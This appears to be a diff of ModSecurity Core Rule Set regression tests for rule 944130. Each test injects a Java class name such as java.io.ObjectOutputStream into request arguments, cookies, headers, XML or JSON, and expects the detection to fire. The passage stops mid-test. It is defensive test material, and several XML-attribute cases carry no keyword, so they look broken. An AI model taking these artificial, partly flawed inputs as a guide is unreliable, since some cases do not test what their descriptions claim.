"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-172 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "XML attribute value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-189 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-192 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-199 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 